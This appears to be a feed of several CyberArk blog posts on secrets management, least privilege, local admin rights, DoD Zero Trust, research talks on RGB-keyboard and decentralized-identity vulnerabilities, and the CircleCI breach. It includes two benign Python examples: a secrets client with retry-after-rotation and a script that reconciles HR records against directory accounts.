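    def __init__(self, provider, ttl_seconds=300, clock=time.monotonic):
        self._provider = provider
        self._ttl = ttl_seconds
        self._clock = clock
        self._cache = {}  # name -> (value, expires_at)

    def get(self, name, force_refresh=False):
        now = self._clock()
        cached = self._cache.get(name)
        if cached and not force_refresh and cached[1] > now:
            return cached[0]
        value = self._provider.fetch(name)
        self._cache[name] = (value, now + self._ttl)
        return value

    def with_secret(self, name, use):
        try:
            return use(self.get(name))
        except AuthError:
            # The cached copy is stale after a rotation: refetch exactly once and retry.
            return use(self.get(name, force_refresh=True))


class FakeDatabase:
    """Constructed downstream system that checks the password on every connect."""

    def __init__(self, password):
        self._password = password

    def rotate(self, new_password):
        self._password = new_password

    def connect(self, password):
        if password != self._password:
            raise AuthError("invalid password")
        return "connected"


def demo():
    """Rotate the secret in both the store and the database between two connects."""
    store = InMemoryProvider({"db/password": "v1"})
    db = FakeDatabase("v1")
    client = SecretsClient(store)
    first = client.with_secret("db/password", db.connect)
    store.rotate("db/password", "v2")
    db.rotate("v2")
    second = client.with_secret("db/password", db.connect)
    return first, second, store.fetch_count


if __name__ == "__main__":
    print(demo())
```

Swapping the in-memory provider for a cloud-native or centralized store only changes the fetch call, which is the portability the bullet above describes. The single retry is deliberate: retrying indefinitely on AuthError would mask a genuinely wrong secret and hammer the store.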

Multiple clouds and hybrid environments don’t need to mean extra work for security teams or developers. Centralizing secrets management with a SaaS-based solution can help ease the way and allow the teams to harness the full power of cloud environments.

Three Ways to Reinforce Least Privilege with Identity Management https://www.cyberark.com/blog/three-ways-to-reinforce-least-privilege-with-identity-management/ Mon, 30 Jan 2023 17:00:43 +0000 https://www.cyberark.com/?p=139460 Reinforce least privilege with Identity Management

The definition of privilege is changing, and this changes everything.

Identities of all types — not just IT team members, but any employees — are gaining access to sensitive data, infrastructure and systems that today’s attackers can easily exploit. In a survey of more than 1,500 IT and security decision-makers, respondents said that, on average, over half of their employees have access to sensitive corporate data.

Managing digital identities — from granting, adjusting and revoking authorizations to complying with audits — is essential. But it’s not easy. The number of identities requiring your protection is surging, as your organization’s digital and cloud initiatives grow in scope and scale.

Industry Breakdown: Average Percentage of Workforce Given Access to Sensitive Corporate Data

Meanwhile, you’re under pressure to manage and protect your identities at a time when:

  • Many enterprises are bogged down with time-consuming manual processes, outdated technologies and silos across apps, directory stores and data repositories.
  • As risks increase, so do workloads, hours and stress levels. Meanwhile, economic pressures exacerbate ongoing resource and skills gaps.

To truly enforce least privilege, IT and security teams need controls that cover all types of identities with powerful access — from the IT admins of the world to workforce users with heightened privileges. This means enterprises need to rethink what Identity Management is, and needs to be, from its purpose to its execution.

Securing Identities for the Entire Lifecycle Using Automation and Orchestration

As you know, enforcing least privilege involves not just limiting access overall, but giving users the minimum level of authorizations needed to perform only job-relevant actions – for example in SaaS applications where a risky action could compromise sensitive data.

The problem is that manual, error-prone processes can hinder many organizations from securely managing employees’ identity lifecycles.

Looking at the beginning of the lifecycle, new employees often wait days or weeks to be provisioned with access to the applications, services and IT systems they need. At some point, impatience may encourage workers to seek other ways to gain access, including the adoption of shadow IT.

But consider what could happen if an IT or security team member forgets a critical step in a manually executed workflow. For example, if an employee leaves the company, the IT team may need to run through a checklist of applications where they must remove access one at a time by hand.

What’s the risk?

One missed step leaves the door open for threat actors to exploit misprovisioned, overprivileged or orphaned accounts — and attackers do this routinely.

IT and security decision-makers believe accelerated employee churn and turnover have caused security issues

Employees’ start and end dates, while important, are only the bookends for continuous identity lifecycle management. Ensuring least privilege for employees across their entire tenures at your organization requires:

  • Months, years and even decades of tracking and re-assigning privileges per user.
  • Provisioning and deprovisioning access as job roles and systems change — and as applications grow in number.
  • Ensuring the wide range of target applications involved remain in sync.

In an era when privilege is everywhere — including in employees’ ability to take risky actions in business apps containing sensitive data — these Identity Management mainstays call for a new approach.

The reason: most enterprises are stuck in a pattern of manually connecting the dots and scripting integrations between data, applications, events and services. And many companies lack formal procedures or consistent workflows for reassessing, adjusting or revoking users’ access and privileges.

Here are some steps you can take to bring a security-first approach to managing identities from a user’s start date to their last day:

1. Centralize your lifecycle management policies, controls and capabilities, using automated workflows for:

  • Onboarding and offboarding employees.
  • Defining and enforcing each user’s unique roles, responsibilities, access rights and permissions.

This approach can free your team from repetitive, error-prone tasks. Integrating these processes with your trusted HR software enables you to maintain consistency and accuracy between platforms.

2. Federate identities across cloud and on-premises applications and systems, so your team can:

  • Quickly provide access when users need it.
  • Adjust it when roles or risks evolve.
  • Remove it when users leave the enterprise.

Automated workflows can help you prevent privilege creep and orphaned accounts that attackers often exploit to launch attacks, steal data and more.

3. Gain real-time insight into potential risks — and the ability to act on them — based on automated tools that track areas such as:

  • Application usage.
  • Failed login attempts.
  • Unused accounts.
  • External threat data.

This three-part approach gives you a scalable form of visibility and control through automated workflows designed to prevent risky actions by users and breach attempts.
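What the three steps above produce in practice is a periodic reconciliation between the HR system of record and the directory, which also surfaces the “troublesome trio” of unchecked access, orphaned accounts and privilege creep called out in the compliance post earlier above. The following is an added example, not CyberArk’s or any identity platform’s code: it compares constructed directory accounts against a constructed HR roster and assumed per-role entitlement baselines, reports orphaned, over-entitled, dormant and unowned accounts, and turns the findings into the disable/revoke/review actions an automated workflow would execute. Names, roles, entitlements and the 90-day dormancy threshold are all illustrative.

```python
from datetime import date

# Constructed sample data: hypothetical employees and entitlements, not from any real directory.
HR_ROSTER = {
    "E100": {"name": "Ana", "status": "active", "role": "developer"},
    "E101": {"name": "Ben", "status": "terminated", "role": "devops", "end_date": "2023-01-10"},
    "E102": {"name": "Cai", "status": "active", "role": "finance"},
}

IDP_ACCOUNTS = [
    {"account": "ana", "employee_id": "E100", "enabled": True,
     "entitlements": {"git:read", "ci:trigger"}, "last_login": "2023-02-10"},
    {"account": "ben", "employee_id": "E101", "enabled": True,
     "entitlements": {"git:read", "ci:admin", "cloud:admin"}, "last_login": "2023-01-09"},
    {"account": "cai", "employee_id": "E102", "enabled": True,
     "entitlements": {"erp:read", "ci:admin"}, "last_login": "2022-10-01"},
    {"account": "svc-build", "employee_id": None, "enabled": True,
     "entitlements": {"ci:trigger"}, "last_login": "2023-02-14"},
    {"account": "dan", "employee_id": "E999", "enabled": True,
     "entitlements": {"git:read"}, "last_login": "2023-02-01"},
]

# Assumed role baselines: the maximum entitlement set each job role should hold.
ROLE_BASELINE = {
    "developer": {"git:read", "git:write", "ci:trigger"},
    "devops": {"git:read", "ci:admin", "cloud:deploy"},
    "finance": {"erp:read", "erp:approve"},
}


def reconcile(roster, accounts, baseline, as_of, dormant_days=90):
    """Compare directory accounts against the HR system of record.

    orphaned         enabled account whose owner has left or has no HR record
    privilege_creep  active owner holding entitlements outside their role baseline
    dormant          active owner who has not signed in for dormant_days
    unowned          account (typically a service account) with no human owner
    """
    findings = {"orphaned": [], "privilege_creep": [], "dormant": [], "unowned": []}
    for acct in accounts:
        name, emp_id = acct["account"], acct["employee_id"]
        if emp_id is None:
            findings["unowned"].append(name)
            continue
        person = roster.get(emp_id)
        if person is None or person["status"] != "active":
            # A leaver's account is an offboarding failure; its entitlements are moot once disabled.
            if acct["enabled"]:
                findings["orphaned"].append(name)
            continue
        excess = acct["entitlements"] - baseline.get(person["role"], set())
        if excess:
            findings["privilege_creep"].append((name, sorted(excess)))
        idle_days = (as_of - date.fromisoformat(acct["last_login"])).days
        if idle_days > dormant_days:
            findings["dormant"].append(name)
    return findings


def remediation_actions(findings):
    """Turn findings into the concrete steps an automated workflow would execute."""
    actions = [("disable", name) for name in findings["orphaned"]]
    actions += [("revoke", name, ent) for name, ents in findings["privilege_creep"] for ent in ents]
    actions += [("review", name) for name in findings["dormant"] + findings["unowned"]]
    return actions


def run_sample(as_of_iso="2023-02-15"):
    return reconcile(HR_ROSTER, IDP_ACCOUNTS, ROLE_BASELINE, date.fromisoformat(as_of_iso))


if __name__ == "__main__":
    for action in remediation_actions(run_sample()):
        print(action)
```

Feeding the HR system in as the source of truth is what makes the check trustworthy: the directory alone cannot tell a leaver from an employee who is merely quiet. Running it on a schedule, and on every HR termination event, closes the gap the manual checklist leaves open.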

Next Steps: Best Practices for Ensuring Compliance and Extending Privilege Controls to All Identities

In a new Executive POV piece published by CyberArk, I discuss best practices for bolstering your team’s Identity Management capabilities in two additional areas:

  1. Applying a security-first approach to compliance, from managing access-related reviews and certifications to meeting regulators’ auditing requirements
  2. Extending the controls you use for securing privileged users to all identities – for example, protecting employee passwords with vault storage and secure sharing

You can read the full piece here: Reinforce Least Privilege by Rethinking Identity Management

Gil Rapaport is the general manager for Identity and Access at CyberArk

Identity Security: Bridging the Executive Confidence/Reality Gap https://www.cyberark.com/blog/identity-security-bridging-the-executive-confidence-reality-gap/ Wed, 25 Jan 2023 15:48:36 +0000 https://www.cyberark.com/?p=139385 Identity Security: Bridging the Executive Confidence/Reality Gap

In recent years, cybersecurity has become a board-level issue resulting in several executives taking greater responsibility in cybersecurity-related decisions. As a result, the CISO is no longer a technical subject matter expert but an executive risk manager who shares a responsibility matrix with the board of directors, CEOs and other executives to make informed risk decisions. At the highest levels, these executives care about the organization’s revenue, mission, risk and costs, leading to strategic questions about assurance, compliance and security practices.

Recent years have highlighted the need for a robust Identity Security strategy to secure the business from modern-day threats and attacks. CyberArk’s upcoming Identity Security State of the Market survey indicates that in 2023, 81% of 1,500 respondents will exponentially increase their spending on Identity Security as part of their cybersecurity budget. This increased investment drives varied perceptions across C-Level executives and all other personnel, including other senior decision makers (VPs/directors/managers) and security practitioners.

Our research finds that C-level executives have an abnormally high degree of confidence in mitigating Identity Security-related risk as opposed to other personnel who are technically astute and aware of the complexities of their IT environments. For example, 69% of the C-level executives believe they are making the correct Identity Security decisions. On the contrary, only 52% of all roles believe the same to be true. This higher confidence of C-level executives was also reflected in their perception of the impact of cybersecurity investment. The chart below highlights this concerning trend across multiple facets of Identity Security.

The survey’s findings reveal a sharp disconnect between the confidence of the C-level executives in their organization’s Identity Security strategy and the actual damage that identity-related cyber incidents can inflict.

Identity Security Confidence Is Not Synonymous With Reality

What’s the proof of this executive overconfidence? Our research indicates that in 2022, 58% of respondents believed they made the right Identity Security decisions. However, this confidence did not necessarily reflect positive outcomes. 63% of the respondents indicated that they suffered at least one successful identity-related attack last year.

Identity Security and the investment vs. implementation gap

This C-level overconfidence could indicate a more significant problem: a lack of understanding of what a robust Identity Security strategy means beyond just investing in tools. Allocating line-item budgets to procure identity-related tools is the first step of a robust Identity Security strategy. Additional measures include integrating those tools, automation and continuous threat detection and response, based on specific business requirements of a given organization.

The Wide-ranging Impact of Identity-based Attacks

Of the 63% of respondents who were victims of an identity-related cyberattack in the last 12 months, 27% have experienced more than one. And the consequences of experiencing a cyberattack are multi-fold. After an attack, the most popular response among respondents was increased investment in cybersecurity technologies and services, which was determined after a thorough gap analysis and risk assessment. Cybersecurity quickly became a board-level discussion if it wasn’t already.

The short-term impact of a successful identity-related cyberattack includes delayed projects, because significant manpower and time are diverted to resolving the incident. Beyond that, products and services are affected, causing problems such as degraded customer experience, potentially lost revenue, compliance fines and extensive audits.

Outcome of identity-related cybersecurity attack

Our research also indicates that insufficient cybersecurity staff and inadequate in-house expertise when it comes to securing identities or mitigating identity-based risks are two major risk factors. The third risk factor – perhaps the most important – is that many organizations lack a specific line-item budget for Identity Security.

Identity Security’s Four Tenets

IDC FutureScape: Worldwide Future of Trust 2023 Predictions states that by 2025, 45% of CEOs, fatigued by security spending without predictable ROI, will demand security metrics and results measurement to assess and validate investments made in their security program. CyberArk believes that this prediction has the potential to materialize sooner, given the rate and sophistication of modern cyberattacks.

The proliferation of identities and endpoints, increased adoption of hybrid and multi-cloud environments and vulnerabilities from inadequately secured identities in the software supply chain are significant causes for concern. 85% of respondents expect to use three or more public cloud service providers in 2023 – and 57% of them have two independent teams responsible for securing identities in the public cloud and on-premises. The CyberArk 2022 Identity Security Threat Landscape Report indicates that respondents use over 70 security vendors on average. As a result, they prefer to procure platform-like “unified controls” from fewer vendors. But a strong Identity Security platform hinges on the four tenets of a robust Identity Security strategy.

In addition to investments in Identity Security tools, C-level executives must regularly seek updates on the state of integration, automation and continuous threat detection and response capabilities to ensure they are well-informed on their organization’s cybersecurity posture related to Identity Security. The following four tenets are foundational to ensuring that the investments adequately deliver on the promise of reduced cyber risk and increased resilience for your organization on an ongoing basis:

  • Identity Security tools span management, privileged controls, governance, authentication and authorization for all human and machine identities.
  • Integration of Identity Security tools across IT and security solutions is a must to secure access to all corporate assets and the entire IT estate.
  • Automation ensures continuous compliance with policies, industry standards and regulations, enabling rapid responses to high-volume routine and anomalous events.
  • Continuous threat detection and response provides organizations with a solid understanding of baseline identity behaviors to better react to anomalous activity.

Do you relate to any of the issues mentioned above? Are you beginning your journey to develop and implement robust Identity Security strategies? If so, it is important to consider comprehensive capabilities from Identity Security vendors that span identity management, access management and privileged access management (PAM) with leadership across these categories.

To read the complete results and analysis, stay tuned for the release of the CyberArk Identity Security State of the Market survey – coming soon.

]]>
Why No User Should Have Local Admin Rights https://www.cyberark.com/blog/why-no-user-should-have-local-admin-rights/ Tue, 24 Jan 2023 14:00:04 +0000 https://www.cyberark.com/?p=139348

The idea of removing local administrator rights from Every. Single. User. across your organization is likely to spark strong reactions. Search popular online forums for the phrase “remove local admin rights” to see exactly what I mean. But hear me out …

Like most security professionals, you recognize the need – and urgency – to remove these powerful privileges from “regular” business users’ endpoints. Local admin rights are like carrots dangling out in the open, ready for cyberattackers to grab and use to move deeper into your network. Plus, typical workforce users don’t need total control of their systems, and they especially don’t need to run arbitrary code with elevated privileges. That’s far too risky.

But eliminating local admin rights completely? What about administrators and database administrators, the help desk, the infrastructure maintenance team and backup operators? They NEED high-level access to do their jobs, and your security team doesn’t have time or resources to manually grant extra privileges on the fly.

All this is true, but it doesn’t mean privileged users must be local admins. I’ll say it again: No user should be a local admin. Full stop. Here are 29 reminders why (and this is by no means an exhaustive list).

A user with local admin rights, or an attacker impersonating the user, can:

  1. Change boot and hardware configurations (enable/disable devices, change CPU and memory voltage and frequencies, etc.)
  2. Modify or delete storage volumes
  3. Radically simplify malware techniques, such as code injection and DLL hijacking
  4. Easily gain persistence on a machine with the registry fully open for analysis and modification
  5. Disable journaling, alter or wipe events
  6. Disable backup agents or modify backup configurations … and wipe any local backup copy while they’re at it
  7. Modify shadow copy settings or copy shadow copy (to exfiltrate previously “deleted” data)
  8. Modify users, add users, add administrative users or hide administrative users from the login menu
  9. Access every user’s data on the machine and change file and folder owners
  10. Encrypt hard drive master boot record (MBR), also known as a 15-second full-disk ransomware encryption
  11. Disable or reconfigure existing endpoint security solutions
  12. Change network settings, add trust zones, set up tunnels or reroute traffic
  13. Change the domain name system (DNS), hijack the DNS or exfiltrate data through DNS requests
  14. Modify browser settings or add browser extensions
  15. Access every secret stored on the machine: In Windows credential providers, in the browser, in Putty, in FileZilla or any other program that stores credentials
  16. Access and modify certificate stores, change trust chains and decrypt any secure communication
  17. Live off the land luxuriously
  18. Access, analyze and modify memory content
  19. Use security services to gain code execution in the Local Security Authority Subsystem Service (LSASS), which can also be used to extract password hashes and Kerberos tickets
  20. Install ANY non-malicious administrative tool and deploy an arsenal of benign tools (that become the “ultimate attacker toolkit” in the wrong hands) without triggering the antivirus
  21. Install cryptominer malware to take over the machine’s resources and use them for illicit cryptocurrency mining
  22. Enable built-in or third-party hardware trackers to locate devices anywhere in the world
  23. Bypass and/or disable User Account Control (UAC)
  24. Downgrade drivers, versions and libraries, or force the use of known vulnerable protocols and programs
  25. Flash firmware to connected devices (e.g., disable the LED on a camera or load modified firmware onto a PLC)
  26. Access security tokens and encryption keys
  27. Jump air gaps to access critical operational technology (OT) systems
  28. Access supervisory control and data acquisition (SCADA) control panels for critical infrastructure, then modify hardware parameters to disable safety sensors or cause hardware resonance
  29. And last but not least, choose their own adventure: Install, remove, access, read, exfiltrate, intercept, unpack, analyze, dump, encrypt, reconfigure, unload, load, enable, disable, execute or remotely execute, cause, force, flip, wipe, mess with and wreak havoc, while also hiding, concealing, dwelling, impersonating, watching, listening, spying, learning and preparing

TL;DR: Eliminate Local Admin Rights Across the Board

Didn’t read through all 29 (and counting) local admin superpowers? Here’s the bottom line: With full admin rights, even the most well-meaning, conscientious workforce user has too much control over your organization’s digital environment, putting critical data and systems (even your existing security stack) in jeopardy.

Not every action listed above requires admin rights, and some attacks will ultimately slip past some endpoint defense-in-depth layers. But assuming breach, eliminating local admin rights across the board and enforcing least privilege at the endpoint (and everywhere else) make it so much harder for attackers to achieve their goals that a majority will look elsewhere.

Removing local admin rights as a security measure is not going to be a revelation to you as a security pro, or to anybody even remotely associated with IT, for that matter. But if you’re anything like me, seeing so many risky possibilities in one place is helpful for making the step from understanding to action.

Now I know what you’re thinking. Restricting users to work under standard user accounts will have a profound positive impact on security, but if cutting admin privilege rights creates significant friction for users, your job will get even more difficult (not to mention the inevitable backlash from angry users).

Once bitten, twice shy, some IT folks even go as far as to say that removing local admin rights hurts an organization more than it helps. And those who are not that radical have probably had different experiences based on their setup — maybe they just spend their day remoting into user machines to install a font or a printer, update a program or change the time zone. Or maybe they tried to force the change on users and eventually had to budge and give the local admin rights back.

All these challenges can be solved by a well-rounded endpoint privilege manager that can remove local admin rights and then, based on policies, elevate certain programs or tasks in a transparent manner so a user would never see a prompt or need to ask IT for assistance. And if they have some special case, users can request elevation, which can be approved without ever remoting to the machine. On the backend, an effective endpoint privilege manager would even integrate with an IT ticketing system for smooth workflows and fast elevations (helpdesk teams, rejoice!).

Endpoint privilege managers are the cornerstone of the modern endpoint security stack, but not all solutions are created equal. A best-of-breed endpoint privilege manager will enable your organization to:

  • Remove local admin rights and enforce least privilege to reduce endpoint security vulnerabilities, then elevate end-user privileges on demand, in real time, with little or no helpdesk involvement.
  • Block ransomware by tightly controlling application permissions based on fine-grained, conditional business rules. Defend against other threats targeting and originating on endpoints.
  • Protect against credential theft by safeguarding credential stores, helping to contain attackers and reduce the attack blast radius.
  • Enhance the user experience by giving the right people and applications the right access to the right resources at the right times.
  • Satisfy audit and compliance requirements by making it easy to enforce and demonstrate policies.
  • Protect Windows, Windows Server, macOS and Linux endpoints from hybrid to cloud environments, while extracting value from day one and realizing rapid ROI.

Need some more convincing that now is the time to remove local admin rights across your business? Explore this guide for key considerations and see how CyberArk Endpoint Privilege Manager can help your team strengthen endpoint security without complicating IT operations or impairing the user experience.


]]>
How Identity Security Addresses Key DoD Zero Trust Requirements https://www.cyberark.com/blog/how-identity-security-addresses-key-dod-zero-trust-requirements/ Fri, 20 Jan 2023 14:00:30 +0000 https://www.cyberark.com/?p=139293

The U.S. Department of Defense (DoD) is going all in on Zero Trust. In late 2022, the Pentagon released its long-anticipated Zero Trust strategy and roadmap for migrating “trusted” perimeter-based networks to a department-wide Zero Trust framework by fiscal year 2027. It’s an ambitious step for the nation’s largest employer of 3.4 million people, but it’s critical.

DoD Principal Deputy Chief Information Officer John B. Sherman didn’t mince words about the agency’s cybersecurity stance, writing, “Our adversaries are in our networks, exfiltrating our data, and exploiting the Department’s users.” This assume breach mindset goes hand-in-hand with the Zero Trust philosophy of denying access by default and verifying every identity – human and machine – to protect sensitive government assets and reduce the risk of data breach.

The DoD’s Zero Trust Strategy at a Glance

The DoD’s Zero Trust strategy calls for layered cybersecurity controls for existing IT infrastructure and cloud services to “reduce the attack surface, enable risk management and effective data-sharing in partnership environments, and quickly contain and remediate adversary activities.” It spans seven pillars and aligns to four high-level goals, shown below. Every agency within the DoD must implement baseline capabilities across these seven pillars to achieve compliance – or “targeted Zero Trust.” Certain organizations must implement more “advanced Zero Trust” capabilities based on system and information sensitivity.

DoD Zero Trust Pillars

Identity Security is a Must for Achieving Government-Wide Zero Trust

The DoD’s Zero Trust plan is part of a broader, government-wide push to strengthen defenses against constant and increasingly sophisticated attacks. In the spring of 2021, the White House issued an executive order outlining guidelines for modernizing and securing federal digital infrastructure. A Zero Trust architecture strategy followed in early 2022 that emphasized identity-centric security, without which “adversaries can take over user accounts and gain a foothold in an agency to steal data or launch attacks,” wrote authors.

Now comes the more difficult job of operationalizing Zero Trust, which requires a complicated mix of policies and technical controls, along with a massive cultural shift, to be successful. Fortunately, federal stakeholders and partners have the Zero Trust Reference Architecture (ZT RA), a prescriptive playbook developed by the Defense Information Systems Agency (DISA) and National Security Agency (NSA) to guide their efforts. Among its guiding principles is the “strict enforcement of identity-based authentication and authorization for all connections and access to infrastructure, data, and services.”

Addressing Key DoD Zero Trust Requirements with Identity Security Controls

Of course, identity isn’t the sole security focus in an agency’s Zero Trust journey, but it’s a big one. Modern Identity Security controls – centered on privilege controls and combining the strengths of identity and access management (IAM), identity governance and administration (IGA) and privileged access management (PAM) – work in concert to mitigate the risk of advanced cyberattacks and meet many of the DoD’s Zero Trust requirements, while providing a strong Zero Trust foundation on which to grow:

Users. Adaptive multifactor authentication (MFA) paired with strong passwords secures identities and authenticates every user – employee, partner or contractor. After login, these user identities can be revalidated to help ensure they should still have access, and reauthenticated for sensitive actions or after periods of inactivity.

Meanwhile, intelligent privilege controls make it possible to enforce least privilege – a Zero Trust “must” – consistently for both human and machine identities (i.e., service accounts) across any device, anywhere. Users get only the permissions needed to perform a specific task, for just the right amount of time. And sessions – for both privileged and workforce users with high-risk access – are continuously monitored and analyzed to help agencies quickly detect and respond to threats.

Devices. User devices are gateways to highly sensitive government resources and prime targets for phishing and ransomware attacks. Identity Security controls make it possible to authorize user devices at each access request, and automatically detect security issues. Automated detection controls that block credential theft (via software abuse or memory scraping) are key to slowing down and containing attacks early on – before they circumvent other defensive layers and cause damage.

Networks and Environments. The traditional perimeter is dead, making “flat” networks even more dangerous. Creating credential boundaries makes it harder for attackers to get from “point A” to “point B,” and to their ultimate target. Web session management for all users helps strengthen these boundaries and create extra layers of security, for instance by isolating sessions to critical resources to prevent malware from spreading, and by enforcing granular access control to improve individual accountability.

Applications and Workloads. The Zero Trust “never trust, always verify” mantra doesn’t just apply to people – especially since machine identities outnumber human identities 45:1. All calls from machine identities seeking access to network resources must be protected. Credentials should be managed and automatically retrieved, and access is securely granted to applications and bots – with the same robust Identity Security controls used for human identities. Likewise, secrets used across the DevOps pipeline must be managed appropriately to protect applications and the broader digital supply chain.

Visibility and Analytics. Thanks to advancements in artificial intelligence (AI), security teams can put analytics engines to work to better visualize, understand and detect their identity-centric risk profile. This gives them a simpler, more effective way to baseline typical user or device behavior, assign risk to each access event, automatically flag issues, and identify and protect against risky access conditions over time.

Automation and Orchestration. The vast number of human and machine identities across government networks today represents a greatly expanded attack surface that adds pressure to mounting compliance requirements. Implementing processes to automate the identity lifecycle through seamless, no-code application integrations and workflows can help agencies take control of excessive permissions to enforce least privilege and move closer to Zero Trust.

The DoD’s new Zero Trust strategy outlines clear requirements and timelines, and agencies need outcome-driven solutions to meet their Zero Trust charge. As the established industry leader, CyberArk offers the most complete and extensible Identity Security Platform, protecting identities and critical assets by enabling Zero Trust and enforcing least privilege. With multiple DoD customers and more than 130 installations across the U.S. federal government today, CyberArk stands ready to help government organizations secure sensitive data and infrastructure, fulfill their Zero Trust mandates and achieve mission success.

]]>
Zero-Days in RGB Keyboards, Top DID Network Exposed at INTENT Threat Research Summit https://www.cyberark.com/blog/zero-days-in-rgb-keyboards-top-did-network-exposed-at-intent-threat-research-summit/ Thu, 19 Jan 2023 20:24:53 +0000 https://www.cyberark.com/?p=139179 INTENT Threat Research Summit

Data breach headlines are daily reminders that cyberattackers keep innovating. While constant research to uncover threats and share crucial intelligence with defenders is far less visible, the second annual INTENT Summit offered a glimpse.

Together with our friends at Checkmarx, CyberArk recently welcomed global security researchers to Tel Aviv to “go down the rabbit hole” and explore today’s most fascinating cybersecurity challenges.

I may be a bit biased, but the event – for researchers, by researchers – was truly incredible. From the décor and music, to the missing vendor booths and life-sized bunny mascot (who had a creepy way of hopping out when you least expected it), the vibe was decidedly “un-security conference,” and buzzing with energy from start to finish. We demystified Tesla’s Bluetooth entry system, broke open-source CI/CD pipelines using code search and injection and shared embedded device security nightmares (and how to tackle them). We competed in an epic capture the flag challenge involving a robotic arm that danced and taunted the crowd, jammed out to a private Tuna concert and cheered for the World Cup finals together.

While I can’t possibly pick a favorite part, a few INTENT sessions stood out to me for their relevancy and potentially far-reaching security implications. If you’re an online gamer, or if the growing self-sovereign identity (aka decentralized identity) movement fascinates you, keep on reading.

Use an RGB Keyboard? Know the Potential Vulnerabilities (Literally) at Your Fingertips

Your computer keyboard isn’t likely to stick out when considering cybersecurity threats, but that may change after this discovery by Tal Lossos, security researcher at CyberArk Labs.

Many online gamers use RGB keyboards – advanced keyboards with colorful, customizable backlit LED lighting – as they battle virtual foes and construct new worlds. There’s a lot to like: RGB keyboards are ergonomic, help boost actions per minute and contribute to an immersive experience. But in some popular models used in Linux environments, the underlying software could cause serious security problems.

Without getting overly technical, Linux operating systems are made up of two levels: User and kernel. The kernel level is privileged, with elevated levels of access that enable interaction with the computer and home to “kernel drivers” – modules that extend support to other hardware devices like your keyboard, mouse and headphones.

Because of the kernel’s high privileges, even the tiniest bug can pose major risks. And exploiting a vulnerability in a kernel driver (like the one used to configure macros on your keyboard) can be just as impactful as exploiting a bug in the kernel itself. You may not realize it, but every time you add a new accessory to your gaming setup, you load a new kernel driver into the kernel, which greatly expands the attack surface.

Lossos set out to find these kernel-level vulnerabilities, and came upon OpenRazer, open-source software that powers most products made by the popular gaming peripherals manufacturer Razer. Deeper analysis of this Linux kernel module revealed several zero-day flaws (CVE-2022-29021, CVE-2022-29022, CVE-2022-29023), including a buffer overflow vulnerability that could potentially be exploited to launch attacks ranging from generic denial of service to full local privilege escalation (in other words, the attacker “owns” your entire system).

Here’s the wildest part: These vulnerabilities are determined by the user’s specific RGB color selections. CyberArk Labs submitted a patch as part of disclosure, but gaming enthusiasts and developers alike will be interested in the details, risk mitigation recommendations and Linux kernel bug hunting considerations highlighted in Lossos’ full INTENT talk and corresponding technical blog post.

RCE’ing Our Way Into the Decentralized Identity Blockchain

There’s a growing global movement toward decentralized identity (DID), in which individuals fully own and control their digital identities as they interact in cyberspace. It’s a fascinating visionary concept, yet it presents a boatload of new challenges, from getting people everywhere to change the way they operate (and take full responsibility for safeguarding their “keys to the kingdom”), standardization and technology constraints and, perhaps the biggest hurdle of all, securing the massive DID attack surface.

At INTENT, Shaked Reiner, principal security researcher at CyberArk Labs, dug into the technology behind DID implementations through the eyes of an attacker. He highlighted five distinct components of the identity attack surface: Blockchain code, private keys, post-authorization, trust-building and traditional “off the chain” systems, and ways they could all be exploited. But the bulk of his talk focused on a critical vulnerability (CVE-2022-31020, CVSS 10) unearthed during DID research involving the Hyperledger Indy-based DID network.

If you’re not familiar with it, Hyperledger Indy is a ledger designed to support identity operations. It’s used to run one of the largest DID networks in production today – Sovrin – along with several other prominent DID networks used by governments.

The vulnerability Reiner and team discovered allows an attacker to take over every node (used to validate transactions, write to the blockchain and read from it) in every Hyperledger Indy network. With this access, the attacker can practically own the consensus algorithm and impersonate any DID in the network.

This incredible research shows how important it is to embed security into the development process from the start and, especially in the case of decentralized identity, extend protections from code to every component involved. Explore Reiner’s decentralized identity 101 post, technical deep dive on the Sovrin vulnerability research and full INTENT talk to learn more.

Be sure to check out free on-demand INTENT sessions for more cutting-edge threat research. After all, enriching and inspiring the community is what INTENT is all about.

]]>
CircleCI Breach Exposes Risk of Hard-coded Secrets https://www.cyberark.com/blog/circleci-breach-exposes-risk-of-hard-coded-secrets/ Fri, 13 Jan 2023 21:03:50 +0000 https://www.cyberark.com/?p=138994

The recent CircleCI breach highlights the risk of storing secrets in places like private code repositories (GitHub), scripts, configuration files, files encrypted at rest, CI/CD pipeline code or anywhere where they cannot easily be rotated, audited, authenticated and secured.

CircleCI is a leading continuous integration and continuous delivery (CI/CD) platform with over a million users. After a recent security breach, CircleCI is advising customers to “[i]mmediately rotate any and all secrets stored in CircleCI” and to “review internal logs for their systems for any unauthorized access.” CircleCI recommends that their customers do not store any “long-lived” credentials in CircleCI.

In addition, we recommend that organizations affected by the breach check for suspicious activity on any integrated SaaS applications and cloud providers, which could have been impacted.

The details are still developing; however, what’s more important is how organizations can proactively prevent this type of attack going forward. For those affected by this breach, highly privileged access for machine identities is now exposed via their secrets to potential attackers, making it difficult to know what the attackers might have access to. Companies impacted need to immediately rotate their secrets, but any secrets that are long-lived or embedded in code will require extra development time to manually find and rotate.

The Problem With Hard-coded Secrets in Applications and Scripts

Secrets are credentials such as passwords, SSH keys, API keys or any private information that grants access to protected resources. These secrets grant non-human/machine identities highly privileged access to sensitive company resources. Controlling the secret allows you to assume the non-human identity.

The most recent CyberArk Identity Security Threat Landscape Report shows that machine/non-human identities outnumber human identities by a factor of 45x, and 68% of non-humans have access to sensitive data and assets, highlighting the importance of protecting secrets and the non-human identities they represent.

To protect non-human identities, organizations should not directly embed secrets in application code, scripts, configuration files or in any static location where unauthorized users can read them or where they cannot quickly be rotated when needed during a security incident. One of the things to keep in mind is that if anyone gains access (authorized or unauthorized) to the source code, they also have access to anything the secrets protect. With that access, they can simply impersonate the identity of the non-human user that secret represents and leverage this identity to escalate privileges and expand the impact of the initial attack.

CircleCI isn’t alone. There have been several high-profile breaches related to non-human access in the news recently. Therefore, the focus should be on how to mitigate the most risk and limit the spread of future attacks. Let’s look at some key lessons from this attack and other recent breaches:

  • Source code doesn’t stay secret: CircleCI isn’t alone. During the same week, Slack reported a “threat actor downloaded private code repositories” after a “limited number of Slack employee tokens were stolen and misused.” Thankfully, no “downloaded repositories contained customer data, means to access customer data.” Sadly, this isn’t the only high-profile leak of source code, but this proves that source code is a terrible place to keep secrets.
  • Attackers target secrets to escalate privileges: The Uber breach reported on September 19, 2022 was spread throughout the enterprise because hard-coded secrets embedded in a PowerShell script allowed the attacker to gain high-level access and escalate privileges. This breach is yet another good example of why you shouldn’t put secrets in code.
